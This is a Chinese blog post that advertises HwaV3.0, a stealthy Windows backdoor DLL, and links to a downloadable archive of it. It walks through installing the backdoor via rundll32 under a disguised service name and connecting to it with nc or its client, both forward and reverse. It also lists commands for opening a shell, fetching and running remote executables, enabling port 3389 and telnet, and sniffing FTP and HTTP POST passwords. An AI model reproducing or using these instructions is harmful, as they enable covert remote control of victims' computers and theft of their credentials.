鬼仔's Blog

作者：linx2008

HwaV3.0优点如下：

1.DLL后门，利用svchost.exe启动，隐蔽进程
2.利用sniff的方式接受命令，实现了无端口的后门，但也可以指定Hway监听133端口接受正向连接。
3.同时支持正向和反向两种连接方式
4.支持文件上传，下载，屏幕截图，进程查杀等功能
5.使用了进程保护.但只在DLL被退出时才把dll注入到explorer.Exe进行进程保护,降低了系统消耗.
6.具有嗅探器的功能,把嗅探到的FTP帐号和来自HTTP POST的敏感信息记录到” system32\snifflogV3.log”下 （这里有个bug：嗅探一段时间后，snifflogV3.log可能会变得很大）

Hway包含3个文件:

hway.dll :为服务端,可改名.
client.exe :为专用连接客户端,可改名.
Hway V3.0说明.txt : Hway V3.0说明文档

[用法]

一.安装/卸载:

把hway.dll(可改名)复制到任意目录,

运行: rundll32 hway.dll,install [是否监听133端口:1=监听,0=不监听] [激活码,默认hway]
例子:
rundll32 hway.dll,install    默认安装,不打开133端口,激活码为hway
rundll32 hway.dll,install   1 abc 安装,打开133端口,激活码为abc
rundll32 hway.dll,install   0 abc 安装,不打开133端口,激活码为abc
卸载
rundll32 hway.dll,uninstall       卸载,不用重启即可卸载完毕

如果安装后hway.dll被自动删除,则说明安装成功,反之请打开C:\WINDOWS\system32\hwaylogV3.txt查看安装失败的原因.

二.正向连接
1.使用rundll32 hway.dll,install (1)安装后的连接方法
方法1.telnet/nc IP 133,出现提示”p”(password)后输入激活码,便可连接
方法2.用client直接连接:client IP -133.
2.向服务器的任意端口发送activeString-o(eg:nc IP 80->回车->hway-o->回车),即可让服务器打开133端口.然后便可用正向连接的方法连接.

三.反向连接
用反向连接请先关闭自己的防火墙

方法1.client IP Port[=任意可以访问的端口] activeString (自动打开本机20082端口,然后向IP port发送activeString让服务器反向连接本机20082端口)

方法2.client IP auto activeString. (自动打开本机20082端口,扫描对方开放的端口,然后发送activeString ,实现反向连接)

方法3.先执行nc -lp 20082监听本机端口,然后向服务器的任意端口发送activeString -c(eg:nc IP 80->回车->activeString -c->回车).

四.使用隐性的执行系统命令
隐性的执行系统命令”是指当正向,反向连接都不可用时(如两台机子都处于局域网),可以向服务器发送”hway-r-你的命令!”执行命令.但执行后是没有回显的.

五.连接Hway后可使用命令:

sysinfo 查看服务器参数
pslist 查看服务器进程
pkill id 查杀服务器进程
Open3389 打开3389端口
shell 进入对方的cmd(而后可用exit退出cmd)
http://xxx.com/door.exe -c backdoor.exe 下载http://xxx.com/door.exe 到system32/backdoor.exe
cap 截图
download 下载c:\\boot.ini到本地(用专用客户端连接才可以传送文件)
upload c:\\abc.exe 上传文件到服务器c:\\abc.exe
close 关闭服务器上的133端口.关闭后建议再连接一次,以确定该端口已经关闭.(由于多线程的原因,要连续关闭两次)

六.提示
-Hway3.0 在winXP,win2000,win2003下测试通过.
-可以直接穿透winxp的防火墙访问默认打开的133端口.
-程序使用了防止异常的代码,一般不会运行错误.是一个相对稳定的后门.
-程序带嗅探功能,嗅探http表单post出去的密码和ftp密码,记录在system32/snifflog.log 下.
-用client连接后截图/传文件可能由于网络延迟而无回显,此时按几下回车即可.
-在正向,反向连接都不可用时(如两台机子都处于局域网),可以向服务器发送”hway-r-你的命令!”执行命令.
(eg:nc IP 80/139->回车->hway-r-cmd /c net user >c:\\net_user.txt&&cmd /c net start telnet!)
-发送hway-o可以打开服务器的133端口
-安装的服务名:Windows Infrared Port Monitor.
-程序未隐藏任何未公布的重大细节,不携带其他后门和病毒.
-查看嗅探到的数据包:type c:\windows\system32\snifflog.log

详细用法看压缩包内图文说明。
http://blogimg.chinaunix.net/blog/upfile2/080712123258.rar